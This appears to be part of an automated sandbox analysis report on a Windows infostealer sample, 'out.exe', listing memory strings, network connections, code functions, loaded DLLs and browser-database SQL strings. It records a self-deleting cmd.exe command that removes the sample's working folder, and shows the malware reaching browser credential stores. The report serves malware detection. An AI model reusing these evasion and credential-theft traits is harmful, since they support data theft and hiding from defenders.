                              Source: AFIDGD.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                              Source: out.exe, 00000000.00000002.2681168765.0000000024E6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                              Source: AFIDGD.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                              Source: out.exe, 00000000.00000002.2681168765.0000000024E6C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                              Source: out.exe, 00000000.00000003.2565106602.0000000027DFB000.00000004.00000020.00020000.00000000.sdmp, AFIDGD.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                              Source: out.exe, 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                              Source: AFIDGD.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                              Source: out.exe, 00000000.00000003.2565106602.0000000027DFB000.00000004.00000020.00020000.00000000.sdmp, AFIDGD.0.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                              Source: out.exe, 00000000.00000002.2681168765.0000000024E6C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                              Source: out.exe, 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                              Source: out.exe, 00000000.00000003.2565106602.0000000027DFB000.00000004.00000020.00020000.00000000.sdmp, AFIDGD.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                              Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49736 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 49.12.106.214:443 -> 192.168.2.5:49752 version: TLS 1.2

                              System Summary

                              barindex
                              PE file has a writeable .text section
                              Source: out.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0002145B GetCurrentProcess,NtQueryInformationProcess,0_2_0002145B
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C47B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6C47B700
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C47B8C0 rand_s,NtQueryVirtualMemory,0_2_6C47B8C0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C47B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,0_2_6C47B910
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C41F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6C41F280
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0003C4720_2_0003C472
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0004D9330_2_0004D933
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0004D1C30_2_0004D1C3
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0003950A0_2_0003950A
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0004DD1B0_2_0004DD1B
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0004CD2E0_2_0004CD2E
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0004D5610_2_0004D561
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0003B7120_2_0003B712
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C4135A00_2_6C4135A0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C4254400_2_6C425440
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C48545C0_2_6C48545C
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C48AC000_2_6C48AC00
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C455C100_2_6C455C10
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C462C100_2_6C462C10
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C48542B0_2_6C48542B
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C4264C00_2_6C4264C0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C43D4D00_2_6C43D4D0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C41D4E00_2_6C41D4E0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C456CF00_2_6C456CF0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C426C800_2_6C426C80
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C4734A00_2_6C4734A0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C47C4A00_2_6C47C4A0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C42FD000_2_6C42FD00
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C43ED100_2_6C43ED10
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C4405120_2_6C440512
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C450DD00_2_6C450DD0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C4785F00_2_6C4785F0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C4346400_2_6C434640
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C462E4E0_2_6C462E4E
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C439E500_2_6C439E50
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C453E500_2_6C453E50
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C486E630_2_6C486E63
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C41C6700_2_6C41C670
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C4656000_2_6C465600
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C457E100_2_6C457E10
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C479E300_2_6C479E30
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C4876E30_2_6C4876E3
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C41BEF00_2_6C41BEF0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C42FEF00_2_6C42FEF0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C47E6800_2_6C47E680
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C435E900_2_6C435E90
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C474EA00_2_6C474EA0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C429F000_2_6C429F00
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C4577100_2_6C457710
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C41DFE00_2_6C41DFE0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C446FF00_2_6C446FF0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C4677A00_2_6C4677A0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C4388500_2_6C438850
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C43D8500_2_6C43D850
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C45F0700_2_6C45F070
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C4278100_2_6C427810
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C45B8200_2_6C45B820
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C4648200_2_6C464820
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C4850C70_2_6C4850C7
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C43C0E00_2_6C43C0E0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C4558E00_2_6C4558E0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C4460A00_2_6C4460A0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C43A9400_2_6C43A940
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C42D9600_2_6C42D960
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C46B9700_2_6C46B970
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C48B1700_2_6C48B170
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C4551900_2_6C455190
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C4729900_2_6C472990
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C41C9A00_2_6C41C9A0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C44D9B00_2_6C44D9B0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C459A600_2_6C459A60
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C458AC00_2_6C458AC0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C431AF00_2_6C431AF0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C45E2F00_2_6C45E2F0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C48BA900_2_6C48BA90
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C4122A00_2_6C4122A0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C444AA00_2_6C444AA0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C42CAB00_2_6C42CAB0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C482AB00_2_6C482AB0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C4153400_2_6C415340
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C42C3700_2_6C42C370
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C45D3200_2_6C45D320
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C4853C80_2_6C4853C8
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C41F3800_2_6C41F380
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C4CAC600_2_6C4CAC60
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C586C000_2_6C586C00
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C59AC300_2_6C59AC30
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C51ECD00_2_6C51ECD0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C4BECC00_2_6C4BECC0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C5EAD500_2_6C5EAD50
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C58ED700_2_6C58ED70
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C648D200_2_6C648D20
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C64CDC00_2_6C64CDC0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C556D900_2_6C556D90
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C4C4DB00_2_6C4C4DB0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C55EE700_2_6C55EE70
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C5A0E200_2_6C5A0E20
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C4CAEC00_2_6C4CAEC0
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C560EC00_2_6C560EC0
                              Source: C:\Users\user\Desktop\out.exeCode function: String function: 00030609 appears 71 times
                              Source: C:\Users\user\Desktop\out.exeCode function: String function: 000304E7 appears 36 times
                              Source: C:\Users\user\Desktop\out.exeCode function: String function: 6C4594D0 appears 90 times
                              Source: C:\Users\user\Desktop\out.exeCode function: String function: 000247E8 appears 38 times
                              Source: C:\Users\user\Desktop\out.exeCode function: String function: 6C44CBE8 appears 134 times
                              Source: C:\Users\user\Desktop\out.exeCode function: String function: 6C6409D0 appears 34 times
                              Source: out.exe, 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs out.exe
                              Source: out.exe, 00000000.00000002.2690538362.000000003DF10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs out.exe
                              Source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs out.exe
                              Source: out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs out.exe
                              Source: out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs out.exe
                              Source: out.exe, 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs out.exe
                              Source: out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs out.exe
                              Source: out.exe, 00000000.00000002.2695905232.0000000049DE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs out.exe
                              Source: out.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/21@2/3
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C477030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,0_2_6C477030
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_000314A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_000314A5
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00031807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,0_2_00031807
                              Source: C:\Users\user\Desktop\out.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199780418869[1].htmJump to behavior
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6552:120:WilError_03
                              Source: C:\Users\user\Desktop\out.exeFile created: C:\Users\user\AppData\Local\Temp\delays.tmpJump to behavior
                              Source: out.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              Source: C:\Users\user\Desktop\out.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\out.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                              Source: out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2681976750.0000000027868000.00000002.00001000.00020000.00000000.sdmp, out.exe, 00000000.00000002.2682330461.0000000029D9E000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                              Source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                              Source: out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2681976750.0000000027868000.00000002.00001000.00020000.00000000.sdmp, out.exe, 00000000.00000002.2682330461.0000000029D9E000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                              Source: out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2681976750.0000000027868000.00000002.00001000.00020000.00000000.sdmp, out.exe, 00000000.00000002.2682330461.0000000029D9E000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                              Source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                              Source: out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2681976750.0000000027868000.00000002.00001000.00020000.00000000.sdmp, out.exe, 00000000.00000002.2682330461.0000000029D9E000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                              Source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                              Source: out.exe, 00000000.00000002.2681976750.0000000027868000.00000002.00001000.00020000.00000000.sdmp, out.exe, 00000000.00000002.2682330461.0000000029D9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                              Source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                              Source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                              Source: out.exe, 00000000.00000002.2681976750.0000000027868000.00000002.00001000.00020000.00000000.sdmp, out.exe, 00000000.00000002.2682330461.0000000029D9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                              Source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                              Source: out.exe, out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2681976750.0000000027868000.00000002.00001000.00020000.00000000.sdmp, out.exe, 00000000.00000002.2682330461.0000000029D9E000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                              Source: out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2681976750.0000000027868000.00000002.00001000.00020000.00000000.sdmp, out.exe, 00000000.00000002.2682330461.0000000029D9E000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                              Source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                              Source: out.exe, 00000000.00000002.2681976750.0000000027868000.00000002.00001000.00020000.00000000.sdmp, out.exe, 00000000.00000002.2682330461.0000000029D9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                              Source: out.exe, 00000000.00000003.2430281824.0000000003071000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2415051886.000000000304E000.00000004.00000020.00020000.00000000.sdmp, BAKKEG.0.dr, FBKJKE.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                              Source: out.exe, 00000000.00000002.2681976750.0000000027868000.00000002.00001000.00020000.00000000.sdmp, out.exe, 00000000.00000002.2682330461.0000000029D9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                              Source: out.exe, 00000000.00000002.2681976750.0000000027868000.00000002.00001000.00020000.00000000.sdmp, out.exe, 00000000.00000002.2682330461.0000000029D9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                              Source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                              Source: unknownProcess created: C:\Users\user\Desktop\out.exe "C:\Users\user\Desktop\out.exe"
                              Source: C:\Users\user\Desktop\out.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BKEBFHIJECFI" & exit
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                              Source: C:\Users\user\Desktop\out.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BKEBFHIJECFI" & exitJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: rstrtmgr.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: dbghelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\out.exeSection loaded: profapi.dllJump to behavior
